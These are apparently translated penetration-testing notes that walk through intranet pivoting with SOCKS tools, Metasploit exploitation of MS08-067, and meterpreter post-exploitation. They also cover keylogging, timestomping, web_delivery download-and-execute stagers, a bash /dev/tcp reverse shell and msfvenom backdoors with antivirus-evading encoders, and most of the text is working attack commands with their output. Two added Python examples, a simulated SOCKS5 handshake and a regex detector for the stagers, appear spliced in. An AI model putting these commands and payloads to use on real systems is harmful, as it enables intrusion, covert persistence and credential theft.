Port forwarding gives you a one-to-one port mapping; to move around the target's internal network more conveniently you need a SOCKS proxy. Below are some commonly used tools.

Windows

0x01 Htran


Step 1
Run on the internet-facing server:
HTran.exe -p -listen 9001 9000
This command listens on two ports: 9001 receives the connection from the intranet machine, and 9000 accepts the SocksCap traffic.

Step 2
Run on the intranet machine:
htran.exe -install //install the SOCKS5 service
htran -start //start it
Htran.exe -p -slave 222.242.XXX.X 9001 127.0.0.1 8009
This command connects to the internet-facing server and relays its data to port 8009 on the intranet machine.

The IP is the server's IP, 9001 is the port the server listens on, 127.0.0.1 is this machine and 8009 is the local port being bounced out.
End result: intranet machine port 8009 -> internet server port 9001 -> local SocksCap uses port 9000 to connect to the internet server.

0x02 EarthWorm


Used in the same way as on Linux.

Linux

0x01 EarthWorm


EW is a portable network tunnelling toolset with two core functions, SOCKS v5 server setup and port forwarding, that can tunnel through complex network environments.
The tool has six command modes (ssocksd, rcsocks, rssocks, lcx_slave, lcx_listen, lcx_tran).

1) Forward SOCKS v5 server

[root@server120 tmp]# ./ew_for_linux64 -s ssocksd -l 8888
ssocksd 0.0.0.0:8888 <--[10000 usec]--> socks server

2) Reverse SOCKS v5 server
On the public VPS:

[root@server120 tmp]# ./ew_for_linux64 -s rcsocks -l 1080 -e 8888 
rcsocks 0.0.0.0:1080 <--[10000 usec]--> 0.0.0.0:8888
init cmd_server_for_rc here
start listen port here

On the compromised intranet host:

[root@server144 tmp]# ./ew_for_linux64 -s rssocks -d 192.168.192.120 -e 8888 
rssocks 192.168.192.120:8888 <--[10000 usec]--> socks server

On the public VPS you will see rssocks cmd_socket OK!, which confirms that the SOCKS5 proxy service is up.

3) Two-tier network (1)
You control hosts A and B. A has a public IP and can only reach intranet host B; B can reach the intranet resources but cannot reach the internet.
Run on B:

[root@server144 tmp]# ./ew_for_linux64 -s ssocksd -l 8888
ssocksd 0.0.0.0:8888 <--[10000 usec]--> socks server

Run on A (this uses the port-forwarding function):

[root@server120 tmp]# ./ew_for_linux64 -s lcx_tran -l 1080 -f 192.168.192.144 -g 8888
lcx_tran 0.0.0.0:1080 <--[10000 usec]--> 192.168.192.144:8888

From the internet, connect to port 1080 on A to use the SOCKS5 proxy set up on B.

4) Two-tier network (2)
You control hosts A and B. A has no public IP and cannot reach the intranet resources either; B can reach the intranet resources but cannot reach the internet.
On the public VPS:

[root@168368 ~]# ./ew -s lcx_listen -l 10800 -e 888
rcsocks 0.0.0.0:10800 <--[10000 usec]--> 0.0.0.0:888
init cmd_server_for_rc here
start listen port here

Proxy requests received on port 10800 are handed over to port 888.

A:

[root@server120 tmp]# ./ew_for_linux64 -s lcx_slave -d 198.98.112.112 -e 888 -f 192.168.192.144 -g 8888
lcx_slave 198.98.112.112:888 <--[10000 usec]--> 192.168.192.144:8888

B:

[root@server144 tmp]# ./ew_for_linux64 -s ssocksd -l 8888
ssocksd 0.0.0.0:8888 <--[10000 usec]--> socks server

Then connect to port 10800 on the public VPS to use the SOCKS5 proxy.

0x02 sSocks


sSocks is a SOCKS proxy toolkit. It can start a SOCKS proxy service, supports SOCKS5 authentication, IPv6 and UDP, and provides a reverse SOCKS proxy, i.e. the remote computer acts as the SOCKS server and bounces the connection back to the local host, which makes intranet penetration testing much easier. The latest version is 0.0.13 and can be downloaded from:
http://sourceforge.net/projects/ssocks/
After downloading and extracting, compile with:
./configure && make
Once compiled, the src directory contains nsocks, ssocksd, ssocks and rcsocks. Their functions are:

Program   Function
nsocks    netcat through a SOCKS5 proxy; used to test a SOCKS server
ssocksd   starts a SOCKS5 proxy service
ssocks    starts a local SOCKS5 service and bounces it to another IP address
rcsocks   receives the bounced SOCKS5 service and redirects it to another port

1) Start the listener on the Kali test machine

root@kali:~/ssocks-0.0.14/src# ./rcsocks -l 1088 -p 1080 -vv
server: set listening client socks relay ...
server: port 1080 open
server: listening on 0.0.0.0:1080
server: set server relay ...
server: port 1088 open
server: listening on 0.0.0.0:1088

Wait for the remote SOCKS5 server to connect to local port 1080; this creates a tunnel between port 1080 and local port 1088.
2) Start the SOCKS5 proxy service on the compromised host and bounce it back

[root@CentOS src]# ./rssocks -vv -s 10.11.100.99:1080

You can see the tunnel being established.

0x03 reGeorg


An open-source tool from abroad:
https://github.com/sensepost/reGeorg
reGeorg is the successor to reDuh. It forwards ports of an intranet server through an HTTP/HTTPS tunnel to the local machine, forming a loop. It is used to reach ports that are open internally on a target server that sits inside an intranet or behind a port policy.
Download the reGeorg archive from GitHub and install urllib3 locally; reGeorg is then ready to run.

First upload the matching reGeorg script to the server. Visiting it directly should display "Georg says, 'All seems fine'", which means the script is running properly.
Upload the tunnel file for the server's language, then point the local client at the uploaded file to form an HTTP loop between the local and remote hosts. The command is:
python reGeorgSocksProxy.py -p 6666 -u http://<target site>/tunnel.jsp //any port will do as long as it does not clash with a port already open locally

0x04 metasploit


First add a route to the target's intranet segment

msf exploit(handler) > route add 10.11.100.1 255.255.255.0 3
[*] Route added
msf exploit(handler) > route print

Active Routing Table
====================

Subnet Netmask Gateway
------ ------- -------
10.11.100.1 255.255.255.0 Session 3

Or add the route directly from within meterpreter

meterpreter > run autoroute -s 10.11.100.1
[*] Adding a route to 10.11.100.1/255.255.255.0...
[+] Added route to 10.11.100.1/255.255.255.0 via 172.16.100.131
[*] Use the -p option to list all active routes

Use the auxiliary/server/socks4a module

msf auxiliary(smb_login) > use auxiliary/server/socks4a
msf auxiliary(socks4a) > exploit
[*] Auxiliary module execution completed

[*] Starting the socks4a proxy server

0x05 SSH
The following commands set up a SOCKS server that tunnels through 123.123.123.123.

1. ssh -N -f -D 1080 123.123.123.123 # bind the port on 127.0.0.1
2. ssh -N -f -D 0.0.0.0:1080 123.123.123.123 # bind the port on 0.0.0.0

Intranet roaming

Windows:
proxifier, SocksCap
Linux:
proxychains

Note

ICMP cannot be proxied, so use the -Pn option when scanning with nmap.
You must use -sT; with -sS the port state is shown as filtered.
So the correct nmap command is:

root@kali:~# proxychains nmap 10.10.10.2 -T4 -sT
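The exchange behind every SOCKS tool above, and the reason for the nmap note: a SOCKS5 client only sends a greeting and a CONNECT request; the proxy performs the real TCP connection itself and reports the outcome in a reply code, so a half-open SYN scan or an ICMP ping has nothing to carry through it and only a full connect (-sT) gets an answer. This is an added Python example, not code from EarthWorm, sSocks or the original notes; the FakeProxy class and its table of reachable ports are constructed stand-ins for a real server.

```python
import socket
import struct

# Reply codes from RFC 1928, section 6 (the SOCKS5 standard, not tool-specific).
REPLY_CODES = {0x00: "succeeded", 0x01: "general SOCKS server failure",
               0x02: "connection not allowed by ruleset", 0x03: "network unreachable",
               0x04: "host unreachable", 0x05: "connection refused",
               0x06: "TTL expired", 0x07: "command not supported",
               0x08: "address type not supported"}

def build_greeting(methods=(0x00,)):
    """Client greeting: VER=5, NMETHODS, METHODS (0x00 = no authentication)."""
    return bytes([0x05, len(methods), *methods])

def build_connect(host, port):
    """CONNECT request for an IPv4 target: VER CMD=1 RSV ATYP=1 DST.ADDR DST.PORT."""
    return bytes([0x05, 0x01, 0x00, 0x01]) + socket.inet_aton(host) + struct.pack("!H", port)

def parse_reply(data):
    """Parse the proxy's reply; returns (reply_code, bound_addr, bound_port)."""
    if len(data) < 10 or data[0] != 0x05 or data[3] != 0x01:
        raise ValueError("malformed or non-IPv4 SOCKS5 reply")
    return data[1], socket.inet_ntoa(data[4:8]), struct.unpack("!H", data[8:10])[0]

class FakeProxy:
    """In-memory stand-in for the SOCKS5 server side (constructed for this example).
    `reachable` maps (host, port) -> bool and simulates the outcome of the proxy's
    own TCP connect(); nothing the client sends is forwarded as raw packets."""
    def __init__(self, reachable):
        self.reachable = reachable

    def handle_greeting(self, data):
        methods = data[2:2 + data[1]]
        # 0x00 = no authentication accepted, 0xFF = no acceptable method
        return bytes([0x05, 0x00 if 0x00 in methods else 0xFF])

    def handle_connect(self, data):
        bnd = socket.inet_aton("0.0.0.0") + struct.pack("!H", 0)
        if data[1] != 0x01:  # only CONNECT is implemented here
            return bytes([0x05, 0x07, 0x00, 0x01]) + bnd
        host = socket.inet_ntoa(data[4:8])
        port = struct.unpack("!H", data[8:10])[0]
        rep = 0x00 if self.reachable.get((host, port), False) else 0x05
        return bytes([0x05, rep, 0x00, 0x01]) + bnd

def connect_via_proxy(proxy, host, port):
    """Run the full greeting + CONNECT exchange and return the proxy's verdict."""
    if proxy.handle_greeting(build_greeting())[1] != 0x00:
        raise RuntimeError("proxy rejected the offered auth methods")
    rep, _addr, _port = parse_reply(proxy.handle_connect(build_connect(host, port)))
    return REPLY_CODES.get(rep, "unknown reply %#x" % rep)

if __name__ == "__main__":
    proxy = FakeProxy({("10.10.10.2", 22): True})  # constructed: only 22/tcp answers
    print(connect_via_proxy(proxy, "10.10.10.2", 22))  # succeeded
    print(connect_via_proxy(proxy, "10.10.10.2", 23))  # connection refused
```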

I. Database connection configuration
1) Start the service
service postgresql start
Check port 5432
root@kali-vincent:~# netstat -anlp | grep post
tcp 0 0 127.0.0.1:5432 0.0.0.0:* LISTEN 25851/postgres
2) Enter the postgresql configuration
sudo -u postgres psql
alter user postgres with password 'admin';
3) Change the password of the Linux system user postgres (same password as the database user postgres)
root@kali:~# sudo passwd -d postgres
passwd:密码过期信息已更改。
root@kali:~# sudo -u postgres passwd
输入新的 UNIX 密码:
重新输入新的 UNIX 密码:
passwd:已成功更新密码
4) Manage PostgreSQL users and databases
root@kali:~# psql -U postgres -h 127.0.0.1
postgres=# create user msf with password 'admin' nocreatedb;
CREATE ROLE

postgres=# create database msf with owner=msf;
CREATE DATABASE
postgres=# \q
5) Configure the msf connection
root@kali:~# msfconsole
msf > db_status
[*] postgresql selected, no connection
msf > db_connect msf:admin@127.0.0.1/msf
[*] Rebuilding the module cache in the background...
msf > db_status
[*] postgresql connected to msf
msf >
db_connect -y /usr/share/metasploit-framework/config/database.yml
6) Configure automatic connection
Edit /usr/share/metasploit-framework/config/database.yml
development: &pgsql
  adapter: postgresql
  database: msf
  username: msf
  password: admin
  host: localhost
  port: 5432
  pool: 5
  timeout: 5
Run db_status to verify the database connection
msf > db_status
[*] postgresql connected to msf

II. Scan results into the database
Use the db_nmap command in msfconsole to run a scan; the results are stored in the database automatically.
msf > db_nmap -sS -A 172.16.100.134
View the scan results
msf > services
[-] The db_services command is DEPRECATED
[-] Use services instead

Services
========

host port proto name state info
---- ---- ----- ---- ----- ----
172.16.100.134 22 tcp ssh open OpenSSH 5.3 protocol 2.0
172.16.100.134 23 tcp telnet open
172.16.100.134 80 tcp http open Apache httpd 2.2.15 (CentOS)
172.16.100.134 111 tcp rpcbind open 2-4 RPC #100000
172.16.100.134 873 tcp rsync open protocol version 30
172.16.100.134 2222 tcp tcpwrapped open
View the target information stored in the database
msf > hosts

Hosts
=====

address mac name os_name os_flavor os_sp purpose info comments
------- --- ---- ------- --------- ----- ------- ---- --------
172.16.100.134 00:0c:29:b0:78:39 Linux 2.6.X server
Use hosts -d ip to delete an IP
Check the msf version
msf > version
Framework: 4.11.4-2015071403
Console : 4.11.4-2015071403.15168
Versions before 4.5 have already had the db_autopwn automated attack removed. Download it from
http://download.csdn.net/download/terrying/5063334
and place it under /usr/share/metasploit-framework/plugins.
db_autopwn -t -p -e (automatically attacks all the IPs)
msf > db_autopwn -t -p -e
Then you can see that a meterpreter session was obtained
[*] Meterpreter session 3 opened (172.16.100.128:55153 -> 172.16.100.166:10413) at 2016-07-02 11:10:23 +0800

1) MS08-067 description
MS08-067, fully named "Windows Server service RPC request buffer overflow vulnerability", could allow remote code execution if an affected system receives a specially crafted RPC request.
MS08-067 affects all Windows systems except Windows Server 2008 Core, including every version of Windows 2000/XP/Server 2003/Vista/Server 2008, and even the Windows 7 Pre-Beta that was still in testing.
2) Exploitation
Test environment: Windows 2000
Scan with nmap first:
C:\Users\dell>nmap -sS -A --script=smb-check-vulns --script-args=unsafe=1 -P0 172.16.100.166
Host script results:
| smb-check-vulns:
| MS08-067: VULNERABLE
| Conficker: Likely CLEAN
| SMBv2 DoS (CVE-2009-3103): NOT VULNERABLE
| MS06-025: NO SERVICE (the Ras RPC service is inactive)
|_ MS07-029: NO SERVICE (the Dns Server RPC service is inactive)
You can see it reports MS08-067: VULNERABLE
Then use metasploit
msf exploit(handler) > use exploit/windows/smb/ms08_067_netapi
msf exploit(ms08_067_netapi) > set rhost 172.16.100.166
rhost => 172.16.100.166
msf exploit(ms08_067_netapi) > exploit

[*] Started reverse handler on 172.16.100.128:4444
[*] Automatically detecting the target...
[*] Fingerprint: Windows 2000 - - lang:Chinese - Traditional
[*] Selected Target: Windows 2000 Universal
[*] Attempting to trigger the vulnerability...
[*] Sending stage (885806 bytes) to 172.16.100.166
[*] Meterpreter session 2 opened (172.16.100.128:4444 -> 172.16.100.166:1030) at 2016-06-29 09:46:54 +0800

meterpreter >

Basic commands:
background # put meterpreter into background mode
sessions -i number # interact with a session; number is the nth session
quit # exit the session
shell # get a command shell

meterpreter > shell
Process 320 created.
Channel 1 created.
Microsoft Windows [版本 5.2.3790]
(C) 版权所有 1985-2003 Microsoft Corp.

C:\Documents and Settings\Administrator\桌面>

cat c:\\boot.ini # view file contents
getwd # show the current working directory
upload /root/Desktop/netcat.exe c:\\ # upload a file to the target
download 0xfa.txt /root/Desktop/ # download a file to the local machine
edit c:\\boot.ini # edit a file
search -d d:\\www -f web.config # search for a file
ps # list the currently active processes
migrate pid # migrate the Meterpreter session into the process whose process id is pid

meterpreter > migrate 3552
[*] Migrating from 904 to 3552...
[*] Migration completed successfully.

execute -H -i -f cmd.exe # create a new cmd.exe process; -H hidden, -i interactive
getpid # get the pid of the current process
kill pid # kill a process
getuid # show the current privileges
sysinfo # show target system information such as machine name and operating system
getsystem # privilege escalation
timestomp c:/a.doc -c "10/27/2015 14:22:11" # change the file's creation time

Keylogging:

meterpreter > keyscan_start
Starting the keystroke sniffer...
meterpreter > keyscan_dump
Dumping captured keystrokes...
whoami <Return> dir <Return>
meterpreter > keyscan_stop
Stopping the keystroke sniffer...

Port forwarding:

meterpreter > portfwd add -l 4444 -p 3389 -r 172.16.100.131
[*] Local TCP relay created: 0.0.0.0:4444 <-> 172.16.100.131:3389

Then check the local listener

root@kali-vincent:/usr/share/metasploit-framework/config# netstat -ano | grep 4444
tcp 0 0 0.0.0.0:4444 0.0.0.0:* LISTEN off (0.00/0/0)

Intranet pivot:

This is the most commonly used meterpreter proxy; it easily routes your machine into the victim's intranet.
Add a new network adapter to the Windows 2003 VM, set it to host-only mode and give it a different subnet, 10.11.100.1, which Kali cannot reach.

msf exploit(handler) > route add 10.11.100.1 255.255.255.0 3
[*] Route added
msf exploit(handler) > route print

Active Routing Table
====================

Subnet Netmask Gateway
------ ------- -------
10.11.100.1 255.255.255.0 Session 3

Or add the route directly from within meterpreter

meterpreter > run autoroute -s 10.11.100.1
[*] Adding a route to 10.11.100.1/255.255.255.0...
[+] Added route to 10.11.100.1/255.255.255.0 via 172.16.100.131
[*] Use the -p option to list all active routes

Now other modules can be used against the intranet. If you want other applications to reach the intranet as well, use the auxiliary/server/socks4a module. Note that proxychains does not support ICMP, so use the -sT -Pn options when running nmap through the proxy.

msf auxiliary(smb_login) > use auxiliary/server/socks4a
msf auxiliary(socks4a) > exploit
[*] Auxiliary module execution completed

[*] Starting the socks4a proxy server

Then check the port listener

root@kali-vincent:/usr/share/metasploit-framework/config# netstat -ano | grep 1080
tcp 0 0 0.0.0.0:1080 0.0.0.0:* LISTEN off (0.00/0/0)
vim /etc/proxychains.conf
add: socks4 127.0.0.1 1080

Then proxychains nmap -sS -v 10.11.100.1 can scan the intranet

The Metasploit module Web Delivery starts a server on Kali whose served content contains the payload.

Python


msf > use exploit/multi/script/web_delivery
msf exploit(web_delivery) > set payload python/meterpreter/reverse_tcp
payload => python/meterpreter/reverse_tcp
msf exploit(web_delivery) > set lhost 172.16.100.182
lhost => 172.16.100.182
msf exploit(web_delivery) > run
[*] Exploit running as background job.

[*] Started reverse TCP handler on 172.16.100.182:4444 
[*] Using URL: http://0.0.0.0:8080/7UBHdklf
[*] Local IP: http://172.16.100.182:8080/7UBHdklf
[*] Server started.
[*] Run the following command on the target machine:
Python:
python -c "import sys; u=__import__('urllib'+{2:'',3:'.request'}[sys.version_info[0]],fromlist=('urlopen',));r=u.urlopen('http://172.16.100.182:8080/7UBHdklf');exec(r.read());"
root@kali:~# netstat -antlp | grep 8080
tcp 0 0 0.0.0.0:8080 0.0.0.0:* LISTEN 5657/ruby

Run that Python command on the test machine

msf exploit(web_delivery) > [*] 172.16.100.1 web_delivery - Delivering Payload
[*] Sending stage (42231 bytes) to 172.16.100.1
[*] Meterpreter session 1 opened (172.16.100.182:4444 -> 172.16.100.1:7292) at 2017-09-14 17:39:42 +0800
[+] negotiating tlv encryption
[+] negotiated tlv encryption
[+] negotiated tlv encryption

msf exploit(web_delivery) > sessions -i 1
[*] Starting interaction with 1...

meterpreter > sysinfo 
Computer : dell-PC
OS : Windows 7 (Build 7601, Service Pack 1)
Architecture : x64
System Language : zh_CN
Meterpreter : python/windows

Powershell


msf > use exploit/multi/script/web_delivery
msf exploit(web_delivery) > set payload windows/meterpreter/reverse_tcp
payload => windows/meterpreter/reverse_tcp
msf exploit(web_delivery) > set lhost 172.16.100.182
lhost => 172.16.100.182
msf exploit(web_delivery) > set target 2
target => 2
msf exploit(web_delivery) > run
[*] Exploit running as background job.

[*] Started reverse TCP handler on 172.16.100.182:4444 
[*] Using URL: http://0.0.0.0:8080/AwOpQNolkZNZz
[*] Local IP: http://172.16.100.182:8080/AwOpQNolkZNZz
[*] Server started.
[*] Run the following command on the target machine:
powershell.exe -nop -w hidden -c $z=new-object net.webclient;$z.proxy=[Net.WebRequest]::GetSystemWebProxy();$z.Proxy.Credentials=[Net.CredentialCache]::DefaultCredentials;IEX $z.downloadstring('http://172.16.100.182:8080/AwOpQNolkZNZz');

Run that PowerShell statement on the test machine

msf exploit(web_delivery) > [*] 172.16.100.1 web_delivery - Delivering Payload
[*] Sending stage (171583 bytes) to 172.16.100.1
[*] Meterpreter session 1 opened (172.16.100.182:4444 -> 172.16.100.1:7336) at 2017-09-14 17:46:00 +0800
[+] negotiating tlv encryption
[+] negotiated tlv encryption
[+] negotiated tlv encryption

PHP


msf > use exploit/multi/script/web_delivery
msf exploit(web_delivery) > set payload php/exec
payload => php/exec
msf exploit(web_delivery) > set target 1
target => 1
msf exploit(web_delivery) > set cmd "bash -i >& /dev/tcp/192.168.192.120/2345 0>&1"
cmd => bash -i >& /dev/tcp/192.168.192.120/2345 0>&1
msf exploit(web_delivery) > show options

Module options (exploit/multi/script/web_delivery):

Name Current Setting Required Description
---- --------------- -------- -----------
SRVHOST 0.0.0.0 yes The local host to listen on. This must be an address on the local machine or 0.0.0.0
SRVPORT 8080 yes The local port to listen on.
SSL false no Negotiate SSL for incoming connections
SSLCert no Path to a custom SSL certificate (default is randomly generated)
URIPATH no The URI to use for this exploit (default is random)



Payload options (php/exec):

Name Current Setting Required Description
---- --------------- -------- -----------
CMD bash -i >& /dev/tcp/192.168.192.120/2345 0>&1 yes The command string to execute



Exploit target:

Id Name
-- ----
1 PHP



msf exploit(web_delivery) > run
[*] Exploit running as background job.

[*] Using URL: http://0.0.0.0:8080/ZuvhhHCImHt5wT1
[*] Local IP: http://172.16.100.182:8080/ZuvhhHCImHt5wT1
[*] Server started.
[*] Run the following command on the target machine:
php -d allow_url_fopen=true -r "eval(file_get_contents('http://172.16.100.182:8080/ZuvhhHCImHt5wT1'));"
msf exploit(web_delivery) > [*] 172.16.100.161 web_delivery - Delivering Payload

The reverse shell is received

[root@server120 ~]# nc -vv -l -p 2345
Listening on any address 2345 (dbm)
Connection from 192.168.190.201:64671
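A detection check for the three web_delivery stagers shown above (the python, powershell and php one-liners all fetch a URL and evaluate the response in memory), run over constructed process-creation log lines. This is an added Python example, not part of the original notes or of Metasploit; the pipe-separated log format and the sample records are constructed, with the command lines copied from this page.

```python
import re

# One rule per interpreter; each captures the trait shared by the web_delivery
# one-liners: download a URL and evaluate the body in memory, never touching disk.
RULES = {
    "web_delivery_python": re.compile(
        r"\bpython[\d.]*\b.*\s-c\s.*urlopen\(.*exec\(", re.I),
    "web_delivery_powershell": re.compile(
        r"\bpowershell(\.exe)?\b.*-nop\b.*-w\s+hidden\b.*\bIEX\s.*downloadstring\(", re.I),
    "web_delivery_php": re.compile(
        r"\bphp\b.*\s-r\s.*eval\(\s*file_get_contents\(", re.I),
}

def classify(cmdline):
    """Return the name of the first matching rule, or None for a benign command line."""
    for name, pattern in RULES.items():
        if pattern.search(cmdline):
            return name
    return None

def scan_log(lines):
    """Return (line_no, rule, cmdline) for every suspicious process launch.
    Record format (constructed for this example): timestamp|host|user|cmdline"""
    hits = []
    for line_no, line in enumerate(lines, 1):
        fields = line.split("|", 3)
        if len(fields) != 4:
            continue  # malformed record: skip it rather than abort the whole scan
        rule = classify(fields[3])
        if rule:
            hits.append((line_no, rule, fields[3]))
    return hits

# Constructed sample log: the three stager commands from this page plus two benign launches.
SAMPLE_LOG = [
    "2017-09-14T17:39:40|dell-PC|dell|python -c \"import sys; u=__import__('urllib'+{2:'',3:'.request'}"
    "[sys.version_info[0]],fromlist=('urlopen',));r=u.urlopen('http://172.16.100.182:8080/7UBHdklf');exec(r.read());\"",
    "2017-09-14T17:45:58|dell-PC|dell|powershell.exe -nop -w hidden -c $z=new-object net.webclient;"
    "$z.proxy=[Net.WebRequest]::GetSystemWebProxy();$z.Proxy.Credentials=[Net.CredentialCache]::DefaultCredentials;"
    "IEX $z.downloadstring('http://172.16.100.182:8080/AwOpQNolkZNZz');",
    "2017-09-14T17:50:02|server120|apache|php -d allow_url_fopen=true -r "
    "\"eval(file_get_contents('http://172.16.100.182:8080/ZuvhhHCImHt5wT1'));\"",
    "2017-09-14T17:51:00|dell-PC|dell|powershell.exe -Command Get-Process",
    "2017-09-14T17:52:00|server120|root|python manage.py runserver",
]

if __name__ == "__main__":
    for line_no, rule, cmdline in scan_log(SAMPLE_LOG):
        print(f"line {line_no}: {rule}: {cmdline[:70]}...")
```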

msfvenom command-line options:

Options:

-p, --payload <payload> Specify the payload to use. To use a custom payload, specify '-' or stdin
-l, --list [module_type] List all available resources of the given module type. Module types: payloads, encoders, nops, all
-n, --nopsled <length> Prepend a NOP sled of the given length to the payload
-f, --format <format> Specify the output format (use --help-formats to list the output formats msf supports)
-e, --encoder [encoder] Specify the encoder to use
-a, --arch <architecture> Specify the target architecture of the payload
--platform <platform> Specify the target platform of the payload
-s, --space <length> Set the maximum size of the payload
-b, --bad-chars <list> Set the characters to avoid, e.g. '\x00\xff'
-i, --iterations <count> Specify how many times to encode the payload
-c, --add-code <path> Specify an additional win32 shellcode file to include
-x, --template <path> Specify a custom executable file to use as a template
-k, --keep Preserve the template program's behaviour; the injected payload runs as a new process
--payload-options List the payload's standard options
-o, --out <path> Save the payload to a file (">" can be used instead)
-v, --var-name <name> Specify a custom variable name to use for certain output formats
--smallest Generate the smallest possible payload
-h, --help Show the help options

--help-formats lists the output formats msf supports

root@kali:/usr/share/metasploit-framework/modules/payloads/singles# msfvenom --help-formats
Executable formats
	asp, aspx, aspx-exe, axis2, dll, elf, elf-so, exe, exe-only, exe-service, exe-small, hta-psh, jar, jsp, loop-vbs, macho, msi, msi-nouac, osx-app, psh, psh-cmd, psh-net, psh-reflection, vba, vba-exe, vba-psh, vbs, war
Transform formats
	bash, c, csharp, dw, dword, hex, java, js_be, js_le, num, perl, pl, powershell, ps1, py, python, raw, rb, ruby, sh, vbapplication, vbscript

The -f format parameter can be replaced by a single capital letter:
e.g. X stands for -f exe

[H]arp
[P]erl
Rub[Y]
[R]aw
[J]s
e[X]e
[D]ll
[V]BA
[W]ar
Pytho[N]

First look at the payloads: there are currently 437 of them, roughly grouped by operating platform (windows/linux/osx/android) and by programming language (python/php, etc.).
root@kali:~# msfvenom -l payloads

List the supported encoders
root@kali:~# msfvenom -l encoders
If you use the -b option (setting the bad characters to avoid), an encoder is invoked automatically.
Otherwise, use the -e option to select an encoder module, for example:
./msfvenom -p windows/meterpreter/bind_tcp -e x86/shikata_ga_nai -f raw
The -i option can also be used to encode several times.
msfvenom -p windows/meterpreter/reverse_tcp -e x86/shikata_ga_nai -i 5 -b '\x00' LHOST=172.16.100.128 LPORT=2345 -f exe -o abc.exe

Some usage demonstrations follow:
Kali: 172.16.100.182
Test machine: 172.16.100.155

Generating a PHP backdoor with msfvenom


List the PHP-related payloads

msfvenom -l payloads | grep php

Here we test with bind_php

php/bind_php Listen for a connection and spawn a command shell via php

Show the configuration options

root@kali:~# msfvenom -p php/bind_php --payload-options

Generate the backdoor

msfvenom -p php/bind_php RHOST=172.16.100.155 R

Remove the leading /*
Visit http://172.16.100.155/1.php and check the listener

[root@vincenthostname html]# netstat -antlp | grep httpd
tcp 0 0 0.0.0.0:4444 0.0.0.0:* LISTEN 1494/httpd

msf > use multi/handler
msf exploit(handler) > set payload php/bind_php
payload => php/bind_php
msf exploit(handler) > show options

Module options (exploit/multi/handler):

Name Current Setting Required Description
---- --------------- -------- -----------



Payload options (php/bind_php):

Name Current Setting Required Description
---- --------------- -------- -----------
LPORT 4444 yes The listen port
RHOST no The target address



Exploit target:

Id Name
-- ----
0 Wildcard Target



msf exploit(handler) > set rhost 172.16.100.155
rhost => 172.16.100.155
msf exploit(handler) > exploit 
[*] Exploit running as background job.

[*] Started bind handler
msf exploit(handler) > [*] Command shell session 1 opened (172.16.100.182:43351 -> 172.16.100.155:4444) at 2017-09-14 15:57:11 +0800

Upgrade to Meterpreter

msf exploit(handler) > sessions -u 1
[*] Executing 'post/multi/manage/shell_to_meterpreter' on session(s): [1]

[*] Upgrading session ID: 1
[*] Starting exploit/multi/handler
[*] Started reverse TCP handler on 172.16.100.182:4433 
[*] Sending stage (826840 bytes) to 172.16.100.155
[*] Meterpreter session 2 opened (172.16.100.182:4433 -> 172.16.100.155:43087) at 2017-09-14 15:58:49 +0800
[+] negotiating tlv encryption
[+] negotiated tlv encryption
[+] negotiated tlv encryption
[*] Command stager progress: 100.00% (736/736 bytes)
msf exploit(handler) > sessions -l

Active sessions
===============

Id Type Information Connection
-- ---- ----------- ----------
1 shell php/php 172.16.100.182:43351 -> 172.16.100.155:4444 (172.16.100.155)
2 meterpreter x86/linux uid=48, gid=48, euid=48, egid=48 @ 172.16.100.155 172.16.100.182:4433 -> 172.16.100.155:43087 (172.16.100.155)

msf exploit(handler) > sessions -i 2
[*] Starting interaction with 2...

meterpreter > sysinfo
Computer : 172.16.100.155
OS : CentOS 6.5 (Linux 2.6.39)
Architecture : x64
Meterpreter : x86/linux

Generating a Java backdoor with msfvenom


List the payloads that can be used

msfvenom -l payloads | grep java

Here we use

java/jsp_shell_reverse_tcp Connect back to attacker and spawn a command shell
root@kali:~# msfvenom -p java/jsp_shell_reverse_tcp LHOST=172.16.100.182 > /tmp/shell.jsp
Payload size: 1500 bytes

After visiting it, a reverse shell is obtained

msf > use multi/handler
msf exploit(handler) > set payload java/jsp_shell_reverse_tcp
payload => java/jsp_shell_reverse_tcp
msf exploit(handler) > set lhost 172.16.100.182
lhost => 172.16.100.182
msf exploit(handler) > exploit 
[*] Exploit running as background job.

[*] Started reverse TCP handler on 172.16.100.182:4444 
msf exploit(handler) > [*] Command shell session 1 opened (172.16.100.182:4444 -> 172.16.100.1:5509) at 2017-09-14 16:11:10 +0800
msf exploit(handler) > sessions -i 1
[*] Starting interaction with 1...

Microsoft Windows [°汾 6.1.7601]
°爨̹Ԑ (c) 2009 Microsoft Corporation¡£±£´̹ԐȨ{¡£

E:\tomcat\bin>whoami
whoami
dell-pc\dell

Generating a Windows backdoor with msfvenom


root@kali-vincent:/tmp# msfvenom -p windows/meterpreter/reverse_tcp -e x86/shikata_ga_nai -i 5 -b '\x00' LHOST=172.16.100.128 LPORT=2345 -f exe -o abc.exe

Local listener:

msf > use exploit/multi/handler
msf exploit(handler) > set payload windows/meterpreter/reverse_tcp
payload => windows/meterpreter/reverse_tcp
msf exploit(handler) > set LHOST 172.16.100.128
LHOST => 172.16.100.128
msf exploit(handler) > set LPORT 2345
LPORT => 2345
msf exploit(handler) > exploit

[*] Started reverse handler on 172.16.100.128:2345 
[*] Starting the payload handler...
[*] Sending stage (885806 bytes) to 172.16.100.1
[*] Meterpreter session 1 opened (172.16.100.128:2345 -> 172.16.100.1:56101) at 2016-03-20 16:08:55 +0800

meterpreter > sysinfo 
Computer : DELL-PC
OS : Windows 7 (Build 7601, Service Pack 1).
Architecture : x64 (Current Process is WOW64)
System Language : zh_CN
Domain : WORKGROUP
Logged On Users : 2
Meterpreter : x86/win32

Generating a PowerShell backdoor for Windows


msfvenom -p windows/x64/meterpreter/reverse_tcp LHOST=172.16.100.182 LPORT=6666 -f psh-reflection > test.ps1
msf > use multi/handler
msf exploit(handler) > set payload windows/x64/meterpreter/reverse_tcp
payload => windows/x64/meterpreter/reverse_tcp
msf exploit(handler) > set lhost 172.16.100.182
lhost => 172.16.100.182
msf exploit(handler) > set lport 6666
lport => 6666
msf exploit(handler) > exploit 
[*] Exploit running as background job.

[*] Started reverse TCP handler on 172.16.100.182:6666

Then run powershell -file "test.ps1" on Windows

msf exploit(handler) > 
[*] Sending stage (194623 bytes) to 172.16.100.1
[*] Meterpreter session 6 opened (172.16.100.182:6666 -> 172.16.100.1:62470) at 2017-09-23 17:33:08 +0800
[+] negotiating tlv encryption
[+] negotiated tlv encryption
[+] negotiated tlv encryption

msf exploit(handler) > sessions -i 6
[*] Starting interaction with 6...

meterpreter > getuid
Server username: dell-PC\dell

References
http://www.freebuf.com/sectool/72135.html
http://www.huo119.com/post/909.shtm